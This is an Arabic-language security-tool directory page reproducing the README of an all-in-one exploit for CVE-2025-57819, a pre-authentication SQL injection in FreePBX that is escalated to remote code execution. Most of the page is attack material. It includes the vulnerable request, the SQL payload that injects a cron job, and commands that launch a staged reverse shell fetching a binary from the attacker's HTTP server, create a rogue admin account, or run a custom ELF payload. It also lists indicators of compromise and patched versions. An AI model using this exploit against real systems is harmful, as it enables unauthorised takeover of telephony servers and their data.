Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-57819-exploit — FreePBX SQLi قبل المصادقة إلى RCE (CVE-2025-57819) — أداة استغلال متكاملة | Kitploit
أدوات/GitHubGitHub/jeanback1/cve-2025-57819-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubjeanback1/cve-2025-57819-exploit

CVE-2025-57819-exploit

FreePBX SQLi قبل المصادقة إلى RCE (CVE-2025-57819) — أداة استغلال متكاملة

عرض المستودع
21منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-57819 — ثغرة حقن SQL قبل المصادقة في FreePBX تؤدي إلى تنفيذ أوامر عن بُعد (RCE)

أداة استغلال شاملة لثغرة CVE-2025-57819، وهي حقن SQL غير مصادق عليه في وحدة endpoint الخاصة بـ FreePBX تؤدي إلى تنفيذ أوامر عن بُعد عبر حقن مهام cron.

  • CVSS: 9.8 (حرجة) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CISA KEV: أُضيفت في 29 أغسطس 2025
  • المتأثر: Sangoma FreePBX 15, 16, 17 مع وحدة endpoint < 15.0.66 / < 16.0.89 / < 17.0.3
  • تم التصحيح في: endpoint 15.0.66, 16.0.89, 17.0.3

ملخص الثغرة

تعرض FreePBX نقطة النهاية admin/ajax.php?module=FreePBX\modules\endpoint\ajax دون اشتراط مصادقة (CWE-288). يتم تمرير معامل brand مباشرة في استعلامات SQL دون تعقيم (CWE-89)، مما يسمح للمهاجم بحقن عبارات SQL عشوائية في قاعدة بيانات asterisk.

سلسلة الهجوم

root@kitploit:~
[Unauthenticated HTTP request]
        │
        ▼
admin/ajax.php?module=FreePBX\...\ajax&command=model&brand=<SQLi>
        │
        ▼
SQL Injection into `cron_jobs` table
(INSERT with attacker-controlled command, schedule="* * * * *")
        │
        ▼
Within ~60 seconds, the cron daemon executes the command as the `asterisk` user
        │
        ▼
Remote Code Execution

قدرات الاستغلال

تدعم هذه الأداة ثلاثة أنماط:

1. قشرة عكسية مرحلية (الافتراضي)

  1. توليد ملف ثنائي linux/x64/shell_reverse_tcp عبر msfvenom
  2. تشغيل خادم HTTP لتقديم الملف الثنائي
  3. تشغيل مستمع TCP للقشرة
  4. حقن مهمة cron عبر SQLi تقوم بتنزيل الملف الثنائي وتنفيذه
  5. عند تنفيذ مهمة cron، ستحصل على قشرة تفاعلية
  6. تنظيف مهمة cron المحقونة عند الخروج
root@kitploit:~
python3 cve_2025_57819_aio.py <target_url> <lhost> <lport>

مثال:

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452

يُستخدم المنفذ 4452 للقشرة العكسية والمنفذ 4453 لخادم HTTP المرحلي.

2. إنشاء مستخدم مسؤول (--create-user)

ينشئ حساب مسؤول جديد في FreePBX عبر SQLi. لا حاجة لقشرة عكسية أو اتصال رجعي أو ملفات ثنائية.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal --create-user

3. حمولة مخصصة (--payload <path>)

استخدم ملفك الثنائي ELF الخاص بدلاً من توليد واحد عبر msfvenom.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452 \
    --payload /path/to/custom_shell.elf

المتطلبات

  • Python 3.6+
  • مكتبة requests (pip install requests)
  • للنمط المرحلي: Metasploit (msfvenom) أو حمولة مخصصة عبر --payload
  • لنمط --create-user: لا شيء يتجاوز Python + requests

كيف يعمل

ناقل حقن SQL

نقطة النهاية المعرضة للخطر هي:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=XXX&model=XXX&brand=<SQLi>

يتم دمج معامل brand في استعلام INSERT الخاص بـ SQL دون تعقيم. تصوغ الأداة الحقن على النحو التالي:

root@kitploit:~
';INSERT INTO cron_jobs (modulename,jobname,command,...) VALUES ('X','Y','<CMD>',NULL,'* * * * *',30,1,1) --

يعمل -- في النهاية على تعليق باقي الاستعلام الأصلي.

تنفيذ Cron

تستخدم FreePBX النظام الفرعي cron الخاص بـ Asterisk. يتم فحص مهام cron كل دقيقة. عندما يتطابق جدول المهمة المدخلة (* * * * *)، يعمل الأمر كمستخدم النظام asterisk.

التنظيف

بعد انتهاء الجلسة (أو عند انتهاء المهلة)، ترسل الأداة استعلام DELETE عبر SQLi لإزالة مهمة cron المحقونة من cron_jobs.

مؤشرات الاختراق

  • إدخالات غير متوقعة في asterisk.cron_jobs بأسماء وحدات/مهام عشوائية
  • طلبات HTTP صادرة من خادم FreePBX إلى عناوين IP خارجية على منافذ عالية
  • اتصالات قشرة عكسية قادمة من مستخدم asterisk
  • حسابات مسؤول جديدة عشوائية في ampusers (إذا تم استخدام نمط --create-user)

التخفيف

حدّث وحدة endpoint إلى الإصدارات المصححة:

  • 15: >= 15.0.66
  • 16: >= 16.0.89
  • 17: >= 17.0.3

المراجع

  • NVD — CVE-2025-57819
  • الاستشارة الأمنية من GitHub — GHSA-m42g-xg4c-5f3h
  • الاستغلالات المعروفة لدى CISA
  • watchTowr Labs
  • استشارة مجتمع FreePBX

إخلاء مسؤولية

هذا البرنامج مقدم لأغراض تعليمية واختبارات أمنية مصرح بها فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام.

تنزيل الأداة